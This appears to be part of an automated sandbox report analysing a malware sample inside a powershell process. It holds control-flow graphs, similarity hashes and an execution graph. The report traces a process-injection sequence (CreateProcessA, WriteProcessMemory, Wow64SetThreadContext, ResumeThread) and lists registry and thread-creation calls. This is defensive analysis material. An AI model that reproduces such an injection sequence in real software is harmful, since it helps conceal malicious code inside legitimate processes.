                    control_flow_graph 642 1b79200-1b79299 644 1b792e2-1b7930a 642->644 645 1b7929b-1b792b2 642->645 649 1b79350-1b793a6 644->649 650 1b7930c-1b79320 644->650 645->644 648 1b792b4-1b792b9 645->648 651 1b792dc-1b792df 648->651 652 1b792bb-1b792c5 648->652 658 1b793ec-1b794e3 CreateProcessA 649->658 659 1b793a8-1b793bc 649->659 650->649 660 1b79322-1b79327 650->660 651->644 653 1b792c7 652->653 654 1b792c9-1b792d8 652->654 653->654 654->654 657 1b792da 654->657 657->651 678 1b794e5-1b794eb 658->678 679 1b794ec-1b795d1 658->679 659->658 668 1b793be-1b793c3 659->668 661 1b7934a-1b7934d 660->661 662 1b79329-1b79333 660->662 661->649 665 1b79337-1b79346 662->665 666 1b79335 662->666 665->665 667 1b79348 665->667 666->665 667->661 670 1b793e6-1b793e9 668->670 671 1b793c5-1b793cf 668->671 670->658 672 1b793d3-1b793e2 671->672 673 1b793d1 671->673 672->672 675 1b793e4 672->675 673->672 675->670 678->679 691 1b795d3-1b795d7 679->691 692 1b795e1-1b795e5 679->692 691->692 693 1b795d9 691->693 694 1b795e7-1b795eb 692->694 695 1b795f5-1b795f9 692->695 693->692 694->695 696 1b795ed 694->696 697 1b795fb-1b795ff 695->697 698 1b79609-1b7960d 695->698 696->695 697->698 699 1b79601 697->699 700 1b79643-1b7964e 698->700 701 1b7960f-1b79638 698->701 699->698 705 1b7964f 700->705 701->700 705->705
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01B794C7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: eb9db0afd04353b89d515c485fff4247712b4f1523d06a271f9855cbcc284763
                    • Instruction ID: 07979b1392953ea14ba43ecd1165518568fb148c377c3260cf19b68aef28b5d6
                    • Opcode Fuzzy Hash: eb9db0afd04353b89d515c485fff4247712b4f1523d06a271f9855cbcc284763
                    • Instruction Fuzzy Hash: E4C12771D002198FDF25DFA8C880BEEBBB1BF09314F0491A9D959B7290DB749A85CF94
                    Function 01B78E61 Relevance: 1.6, APIs: 1, Instructions: 123injectionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 706 1b78e61-1b78ed3 709 1b78ed5-1b78ee7 706->709 710 1b78eea-1b78f51 WriteProcessMemory 706->710 709->710 712 1b78f53-1b78f59 710->712 713 1b78f5a-1b78fac 710->713 712->713
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01B78F3B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 7fe8dc12b2b92539586147e9324911b83ecfd896410d370b621df1dd49391561
                    • Instruction ID: 77f1f704f9953d68d4c7a5d6370ca6f877d802ed1c9e49086f5996c41a5a52a7
                    • Opcode Fuzzy Hash: 7fe8dc12b2b92539586147e9324911b83ecfd896410d370b621df1dd49391561
                    • Instruction Fuzzy Hash: F041BBB5D002489FCF04CFA9D984AEEFBF1BB49310F20942AE914BB240C335AA45CB64
                    Function 01B78E68 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 718 1b78e68-1b78ed3 720 1b78ed5-1b78ee7 718->720 721 1b78eea-1b78f51 WriteProcessMemory 718->721 720->721 723 1b78f53-1b78f59 721->723 724 1b78f5a-1b78fac 721->724 723->724
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01B78F3B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 25da3a8e51f2edb5756b1c68db5c0d1071ca020467d365de577da7966e1355f7
                    • Instruction ID: 0423024c1ca2e063377c391ee8b1cc169e2dff7ab0dcae5ad5476ade0a651c5f
                    • Opcode Fuzzy Hash: 25da3a8e51f2edb5756b1c68db5c0d1071ca020467d365de577da7966e1355f7
                    • Instruction Fuzzy Hash: 1741ABB5D012489FCF04CFA9D984AEEFBF1BB49314F20942AE915BB250D334AA45CF64
                    Function 01B78B18 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 729 1b78b18-1b78b80 732 1b78b97-1b78be5 Wow64SetThreadContext 729->732 733 1b78b82-1b78b94 729->733 735 1b78be7-1b78bed 732->735 736 1b78bee-1b78c3a 732->736 733->732 735->736
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01B78BCF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: b6392fe624475b9f94f2992e54f3de4b608357e88c4d4fcc58c0b6a575ec7be3
                    • Instruction ID: 7939c3c9356296068169ab387c30234415169d364d5373438aeaf7cd51480f17
                    • Opcode Fuzzy Hash: b6392fe624475b9f94f2992e54f3de4b608357e88c4d4fcc58c0b6a575ec7be3
                    • Instruction Fuzzy Hash: 0541BBB4D002589FCF14CFA9D984AEEFBB1BF49314F24842AE815B7240D779A945CFA4
                    Function 01B78B20 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 741 1b78b20-1b78b80 743 1b78b97-1b78be5 Wow64SetThreadContext 741->743 744 1b78b82-1b78b94 741->744 746 1b78be7-1b78bed 743->746 747 1b78bee-1b78c3a 743->747 744->743 746->747
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01B78BCF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 01430705562907c93d18d6da387041c41973208d1937369041a2a833695977e8
                    • Instruction ID: cdd961c0cc699bd8834bb975a48b204b4355a1da46a49d4d9a5fd053925375fc
                    • Opcode Fuzzy Hash: 01430705562907c93d18d6da387041c41973208d1937369041a2a833695977e8
                    • Instruction Fuzzy Hash: 8541BCB4D002589FCF14CFA9D984AEEFBF1BB48314F14842AE415B7240D739A945CF64
                    Function 01B78A28 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 752 1b78a28-1b78ac4 ResumeThread 755 1b78ac6-1b78acc 752->755 756 1b78acd-1b78b0f 752->756 755->756
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 01B78AAE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 930f06362528dca1fb04133e94279ce29b6cd82f24956d9e776ffaddcf836c66
                    • Instruction ID: 5b9df3f8d8682b9c1937f64a096ce49664d28bd2e5a2b7b5587c58b5115454ce
                    • Opcode Fuzzy Hash: 930f06362528dca1fb04133e94279ce29b6cd82f24956d9e776ffaddcf836c66
                    • Instruction Fuzzy Hash: 3131D8B4D002189FCF14CFA9D984AEEFBB0AB49314F14842AE815B7310C735A905CF94
                    Function 01B78A30 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 761 1b78a30-1b78ac4 ResumeThread 764 1b78ac6-1b78acc 761->764 765 1b78acd-1b78b0f 761->765 764->765
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 01B78AAE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 2910b0c4d9bed7b4a296e67238fdfe8e0c6b2b898187900f1046e9d1f926759a
                    • Instruction ID: d3009812c1575e80d11d3a94c327619dac80ef98d9f3a97480da2fccfdcaefe7
                    • Opcode Fuzzy Hash: 2910b0c4d9bed7b4a296e67238fdfe8e0c6b2b898187900f1046e9d1f926759a
                    • Instruction Fuzzy Hash: B831DAB4D002189FCF14CFAAD984AAEFBB1BF49314F14842AE815B7310C734A905CF94
                    Function 01D71620 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 770 1d71620-1d71637 772 1d71647 770->772 773 1d71639-1d71645 770->773 774 1d71649-1d7164b 772->774 773->774 775 1d716f4-1d716fe 774->775 776 1d71651-1d71669 774->776 777 1d71700-1d71706 775->777 778 1d71709-1d7170f 775->778 783 1d71744-1d7178c 776->783 784 1d7166f-1d71674 776->784 779 1d71715-1d71721 778->779 780 1d71711-1d71713 778->780 782 1d71723-1d71741 779->782 780->782 792 1d7178e-1d7179a 783->792 793 1d7179c 783->793 786 1d71676-1d7167c 784->786 787 1d7168c-1d71696 784->787 789 1d71680-1d7168a 786->789 790 1d7167e 786->790 794 1d7169b-1d716ac 787->794 789->787 790->787 796 1d7179e-1d717a0 792->796 793->796 794->783 805 1d716b2-1d716b7 794->805 798 1d717a6-1d717a8 796->798 799 1d7185f-1d71869 796->799 803 1d717c2-1d717cb 798->803 804 1d717aa-1d717b0 798->804 801 1d71877-1d7187d 799->801 802 1d7186b-1d71874 799->802 806 1d71883-1d7188f 801->806 807 1d7187f-1d71881 801->807 812 1d717cf-1d717de 803->812 813 1d717cd 803->813 808 1d717b4-1d717c0 804->808 809 1d717b2 804->809 810 1d716cf-1d716f1 805->810 811 1d716b9-1d716bf 805->811 814 1d71891-1d718ad 806->814 807->814 808->803 809->803 815 1d716c3-1d716cd 811->815 816 1d716c1 811->816 823 1d717e0-1d717eb 812->823 824 1d717ed-1d71833 812->824 813->812 815->810 816->810 826 1d71853-1d7185c 823->826 833 1d71835 824->833 834 1d7183f-1d71849 824->834 836 1d7183a 833->836 835 1d7184b 834->835 834->836 835->826 836->834
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 54ab3a3012e8c72008a6932e1adf7d1d2efb87e7f841138a40678a799abb2bd2
                    • Instruction ID: 1dc5d964ce52d26897ca89a7f2146e133c2adc6d8bd56ca90cced342ab1b2df6
                    • Opcode Fuzzy Hash: 54ab3a3012e8c72008a6932e1adf7d1d2efb87e7f841138a40678a799abb2bd2
                    • Instruction Fuzzy Hash: 991189753002159FEB14DE59C881E7AF7AAFFC8350B1DC26AE9088B256DB32DD41CB91
                    Function 01D71628 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 83c761ac4d0cbce7dd6d005bfce834430b882efed3f316a7ded7a6ee8eb0e4a1
                    • Instruction ID: 5e4073c99dfaa49b3a746f7987728acb4fb8b277072f5c733ec12bff85669e55
                    • Opcode Fuzzy Hash: 83c761ac4d0cbce7dd6d005bfce834430b882efed3f316a7ded7a6ee8eb0e4a1
                    • Instruction Fuzzy Hash: 4A1194753002109FEB14DE49C881E7AF7AAFFC8350B1DC26AE9088B255DB32DD41CB91
                    Function 0028D01D Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436508438.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_28d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b0f10a736307255401b341c7f5dae05bb9916dc1cabf5ed4863f5e5cfe193ac2
                    • Instruction ID: 5f779bcc847035b254f856760a316214e26bb103eb182ed8659f2fed56a8f8f3
                    • Opcode Fuzzy Hash: b0f10a736307255401b341c7f5dae05bb9916dc1cabf5ed4863f5e5cfe193ac2
                    • Instruction Fuzzy Hash: 8D01D475419340AAE7106E25CC84B6BBF98EF41324F18841AEC454A2C6C6B9D849C7B1
                    Function 01D711B0 Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb325c27611db059247a7ac22c6be8a1c56f6dbff7153b3a93f0e2c69cdd1a7e
                    • Instruction ID: be771336e32296e9d99dbf894907cb03bcb03bc18db1f47afb687a851be45891
                    • Opcode Fuzzy Hash: fb325c27611db059247a7ac22c6be8a1c56f6dbff7153b3a93f0e2c69cdd1a7e
                    • Instruction Fuzzy Hash: 39F0C2B070030837DA6426698856F6F69AAAFC9B00F508018F945EF3C1DDB29C8543A5
                    Function 0028D01C Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436508438.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_28d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b11a5d1856cf47ad867d05b4e91c4b56feb2fa269267b977520b81cfa7f39ea9
                    • Instruction ID: 97fc36181cca846673fbe07b2b81694f3c8a22d1a2e8d0cd0c064f0453ee5b79
                    • Opcode Fuzzy Hash: b11a5d1856cf47ad867d05b4e91c4b56feb2fa269267b977520b81cfa7f39ea9
                    • Instruction Fuzzy Hash: 36F04F71445244AAE7109E16CCC4B67FB98EB51724F18C55AED484A2D6C279AC48CBB1

                    Non-executed Functions

                    Function 01B7593A Relevance: .8, Instructions: 800COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 824b4ce6a9e175ba46fcb588d9f9887651beaa4f3970fa4fa82abe6ef287328d
                    • Instruction ID: 56c83fe4ac608655e3bc1d7c6773ef9e5a971e088ff502f1079591ae8d379365
                    • Opcode Fuzzy Hash: 824b4ce6a9e175ba46fcb588d9f9887651beaa4f3970fa4fa82abe6ef287328d
                    • Instruction Fuzzy Hash: 6352E1759093859FD717CB68D8A49D9BFB0FF06210B0A85DAD480DF2A3D734984ACBA1
                    Function 01D700A0 Relevance: 12.9, Strings: 10, Instructions: 413COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$$p$$p
                    • API String ID: 0-1154554433
                    • Opcode ID: 62cdd4548ff21fa18750b2a76d08b6456286bc3db22c28cbfb3abcdfc57c5202
                    • Instruction ID: 83471612e5e218b83c179b7cda1591f253ae77253d02add0da46fa23e9b64ac2
                    • Opcode Fuzzy Hash: 62cdd4548ff21fa18750b2a76d08b6456286bc3db22c28cbfb3abcdfc57c5202
                    • Instruction Fuzzy Hash: CED1F835B00204DFDF199A6CD850B6EBFA2AFCA310F548066F9459B2D1EB71DD41C791
                    Function 01D74020 Relevance: 10.2, Strings: 8, Instructions: 199COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-2834719986
                    • Opcode ID: 1003111263519fba4f1e1a179623ecaed99ef2f6b971cefc37f7c69ff5282bb8
                    • Instruction ID: 58343c221e53760b457f09b931e40b1838a7eef3dbee86cb9d85cc3f0d81b833
                    • Opcode Fuzzy Hash: 1003111263519fba4f1e1a179623ecaed99ef2f6b971cefc37f7c69ff5282bb8
                    • Instruction Fuzzy Hash: 255106357002118FDB17AA6DD41077ABFA6AFC9211F68817BD995CB256EF31CC41C3A2
                    Function 01D71B58 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: ba84a05e06d2957c901f5e2e79a4439396edca17719a4db41303c60e9a4a4a96
                    • Instruction ID: e442bceeb6d246e84ca847840fea36a676e75c188506d10a7d40460ad2ac860a
                    • Opcode Fuzzy Hash: ba84a05e06d2957c901f5e2e79a4439396edca17719a4db41303c60e9a4a4a96
                    • Instruction Fuzzy Hash: D9512632B043118FDB259AAD940167AFFE6AFC9210F28827FD595C7256FA31C841C761
                    Function 01D749A8 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p
                    • API String ID: 0-2334450948
                    • Opcode ID: 169c8307a5bda7e8cceb5c1805a544672d58ec0380ea17edec557a78c328c02a
                    • Instruction ID: eac96673c7f53ab82f6ff263aa1a977efb4f897bc1d7e598d7dc4f978ab1ee1e
                    • Opcode Fuzzy Hash: 169c8307a5bda7e8cceb5c1805a544672d58ec0380ea17edec557a78c328c02a
                    • Instruction Fuzzy Hash: 7A410336704201DFDB2B5E6CC80167BFBE2AFC9225BA8816FD9518B252FB70C941C755

                    Execution Graph

                    Execution Coverage:4.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.7%
                    Total number of Nodes:1635
                    Total number of Limit Nodes:60
                    execution_graph 47241 445847 47242 445852 47241->47242 47244 44587b 47242->47244 47246 445877 47242->47246 47247 448a84 47242->47247 47254 44589f DeleteCriticalSection 47244->47254 47255 4484ca 47247->47255 47250 448ac9 InitializeCriticalSectionAndSpinCount 47251 448ab4 47250->47251 47262 434fcb 47251->47262 47253 448ae0 47253->47242 47254->47246 47256 4484f6 47255->47256 47257 4484fa 47255->47257 47256->47257 47261 44851a 47256->47261 47269 448566 47256->47269 47257->47250 47257->47251 47259 448526 GetProcAddress 47260 448536 __crt_fast_encode_pointer 47259->47260 47260->47257 47261->47257 47261->47259 47263 434fd6 IsProcessorFeaturePresent 47262->47263 47264 434fd4 47262->47264 47266 435018 47263->47266 47264->47253 47276 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47266->47276 47268 4350fb 47268->47253 47270 448587 LoadLibraryExW 47269->47270 47274 44857c 47269->47274 47271 4485a4 GetLastError 47270->47271 47272 4485bc 47270->47272 47271->47272 47275 4485af LoadLibraryExW 47271->47275 47273 4485d3 FreeLibrary 47272->47273 47272->47274 47273->47274 47274->47256 47275->47272 47276->47268 47277 434887 47278 434893 ___DestructExceptionObject 47277->47278 47304 434596 47278->47304 47280 43489a 47282 4348c3 47280->47282 47610 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47280->47610 47290 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47282->47290 47315 444251 47282->47315 47285 4348e2 ___DestructExceptionObject 47287 434962 47323 434b14 47287->47323 47290->47287 47611 4433e7 36 API calls 4 library calls 47290->47611 47297 434984 47298 43498e 47297->47298 47613 44341f 28 API calls _Atexit 47297->47613 47300 434997 47298->47300 47614 4433c2 28 API calls _Atexit 47298->47614 47615 43470d 13 API calls 2 library calls 47300->47615 47303 43499f 47303->47285 47305 43459f 47304->47305 47616 434c52 IsProcessorFeaturePresent 47305->47616 47307 4345ab 47617 438f31 47307->47617 47309 4345b0 47314 4345b4 47309->47314 47626 4440bf 47309->47626 47312 4345cb 47312->47280 47314->47280 47316 444268 47315->47316 47317 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47316->47317 47318 4348dc 47317->47318 47318->47285 47319 4441f5 47318->47319 47322 444224 47319->47322 47320 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47321 44424d 47320->47321 47321->47290 47322->47320 47676 436e90 47323->47676 47326 434968 47327 4441a2 47326->47327 47678 44f059 47327->47678 47329 434971 47332 40e9c5 47329->47332 47330 4441ab 47330->47329 47682 446815 36 API calls 47330->47682 47853 41cb50 LoadLibraryA GetProcAddress 47332->47853 47334 40e9e1 GetModuleFileNameW 47858 40f3c3 47334->47858 47336 40e9fd 47873 4020f6 47336->47873 47339 4020f6 28 API calls 47340 40ea1b 47339->47340 47879 41be1b 47340->47879 47344 40ea2d 47905 401e8d 47344->47905 47346 40ea36 47347 40ea93 47346->47347 47348 40ea49 47346->47348 47911 401e65 47347->47911 48180 40fbb3 118 API calls 47348->48180 47351 40eaa3 47355 401e65 22 API calls 47351->47355 47352 40ea5b 47353 401e65 22 API calls 47352->47353 47354 40ea67 47353->47354 48181 410f37 36 API calls __EH_prolog 47354->48181 47356 40eac2 47355->47356 47916 40531e 47356->47916 47359 40ea79 48182 40fb64 78 API calls 47359->48182 47360 40ead1 47921 406383 47360->47921 47363 40ea82 48183 40f3b0 71 API calls 47363->48183 47370 401fd8 11 API calls 47372 40eefb 47370->47372 47371 401fd8 11 API calls 47373 40eafb 47371->47373 47612 4432f6 GetModuleHandleW 47372->47612 47374 401e65 22 API calls 47373->47374 47375 40eb04 47374->47375 47938 401fc0 47375->47938 47377 40eb0f 47378 401e65 22 API calls 47377->47378 47379 40eb28 47378->47379 47380 401e65 22 API calls 47379->47380 47381 40eb43 47380->47381 47382 40ebae 47381->47382 48184 406c1e 47381->48184 47383 401e65 22 API calls 47382->47383 47389 40ebbb 47383->47389 47385 40eb70 47386 401fe2 28 API calls 47385->47386 47387 40eb7c 47386->47387 47390 401fd8 11 API calls 47387->47390 47388 40ec02 47942 40d069 47388->47942 47389->47388 47395 413549 3 API calls 47389->47395 47391 40eb85 47390->47391 48189 413549 RegOpenKeyExA 47391->48189 47393 40ec08 47394 40ea8b 47393->47394 47945 41b2c3 47393->47945 47394->47370 47401 40ebe6 47395->47401 47399 40ec23 47402 40ec76 47399->47402 47962 407716 47399->47962 47400 40f34f 48272 4139a9 30 API calls 47400->48272 47401->47388 48192 4139a9 30 API calls 47401->48192 47405 401e65 22 API calls 47402->47405 47408 40ec7f 47405->47408 47407 40f365 48273 412475 65 API calls ___scrt_fastfail 47407->48273 47416 40ec90 47408->47416 47417 40ec8b 47408->47417 47411 40ec42 48193 407738 30 API calls 47411->48193 47412 40ec4c 47414 401e65 22 API calls 47412->47414 47426 40ec55 47414->47426 47415 40f36f 47419 41bc5e 28 API calls 47415->47419 47422 401e65 22 API calls 47416->47422 48196 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47417->48196 47418 40ec47 48194 407260 98 API calls 47418->48194 47423 40f37f 47419->47423 47424 40ec99 47422->47424 48072 413a23 RegOpenKeyExW 47423->48072 47966 41bc5e 47424->47966 47426->47402 47430 40ec71 47426->47430 47427 40eca4 47970 401f13 47427->47970 48195 407260 98 API calls 47430->48195 47434 401f09 11 API calls 47436 40f39c 47434->47436 47438 401f09 11 API calls 47436->47438 47440 40f3a5 47438->47440 47439 401e65 22 API calls 47442 40ecc1 47439->47442 48075 40dd42 47440->48075 47445 401e65 22 API calls 47442->47445 47447 40ecdb 47445->47447 47446 40f3af 47448 401e65 22 API calls 47447->47448 47449 40ecf5 47448->47449 47450 401e65 22 API calls 47449->47450 47451 40ed0e 47450->47451 47453 401e65 22 API calls 47451->47453 47483 40ed7b 47451->47483 47452 40ed8a 47454 40ed93 47452->47454 47458 40ee0f ___scrt_fastfail 47452->47458 47457 40ed23 _wcslen 47453->47457 47455 401e65 22 API calls 47454->47455 47456 40ed9c 47455->47456 47459 401e65 22 API calls 47456->47459 47461 401e65 22 API calls 47457->47461 47457->47483 47982 413947 47458->47982 47462 40edae 47459->47462 47460 40ef06 ___scrt_fastfail 48257 4136f8 RegOpenKeyExA 47460->48257 47464 40ed3e 47461->47464 47465 401e65 22 API calls 47462->47465 47467 401e65 22 API calls 47464->47467 47468 40edc0 47465->47468 47466 40ef51 47471 401e65 22 API calls 47466->47471 47469 40ed53 47467->47469 47470 401e65 22 API calls 47468->47470 48197 40da34 47469->48197 47472 40ede9 47470->47472 47473 40ef76 47471->47473 47477 401e65 22 API calls 47472->47477 47992 402093 47473->47992 47476 401f13 28 API calls 47479 40ed72 47476->47479 47481 40edfa 47477->47481 47480 401f09 11 API calls 47479->47480 47480->47483 48255 40cdf9 45 API calls _wcslen 47481->48255 47482 40ef88 47998 41376f RegCreateKeyA 47482->47998 47483->47452 47483->47460 47487 40eea3 ctype 47492 401e65 22 API calls 47487->47492 47488 40ee0a 47488->47458 47490 401e65 22 API calls 47491 40efaa 47490->47491 48004 43baac 47491->48004 47493 40eeba 47492->47493 47493->47466 47497 40eece 47493->47497 47496 40efc1 48260 41cd9b 87 API calls ___scrt_fastfail 47496->48260 47499 401e65 22 API calls 47497->47499 47498 40efe4 47503 402093 28 API calls 47498->47503 47501 40eed7 47499->47501 47504 41bc5e 28 API calls 47501->47504 47502 40efc8 CreateThread 47502->47498 49197 41d45d 10 API calls 47502->49197 47505 40eff9 47503->47505 47506 40eee3 47504->47506 47508 402093 28 API calls 47505->47508 48256 40f474 104 API calls 47506->48256 47509 40f008 47508->47509 48008 41b4ef 47509->48008 47510 40eee8 47510->47466 47512 40eeef 47510->47512 47512->47394 47514 401e65 22 API calls 47515 40f019 47514->47515 47516 401e65 22 API calls 47515->47516 47517 40f02b 47516->47517 47518 401e65 22 API calls 47517->47518 47519 40f04b 47518->47519 47520 43baac _strftime 40 API calls 47519->47520 47521 40f058 47520->47521 47522 401e65 22 API calls 47521->47522 47523 40f063 47522->47523 47524 401e65 22 API calls 47523->47524 47525 40f074 47524->47525 47526 401e65 22 API calls 47525->47526 47527 40f089 47526->47527 47528 401e65 22 API calls 47527->47528 47529 40f09a 47528->47529 47530 40f0a1 StrToIntA 47529->47530 48032 409de4 47530->48032 47533 401e65 22 API calls 47534 40f0bc 47533->47534 47535 40f101 47534->47535 47536 40f0c8 47534->47536 47538 401e65 22 API calls 47535->47538 48261 4344ea 47536->48261 47540 40f111 47538->47540 47543 40f159 47540->47543 47544 40f11d 47540->47544 47541 401e65 22 API calls 47542 40f0e4 47541->47542 47545 40f0eb CreateThread 47542->47545 47547 401e65 22 API calls 47543->47547 47546 4344ea new 22 API calls 47544->47546 47545->47535 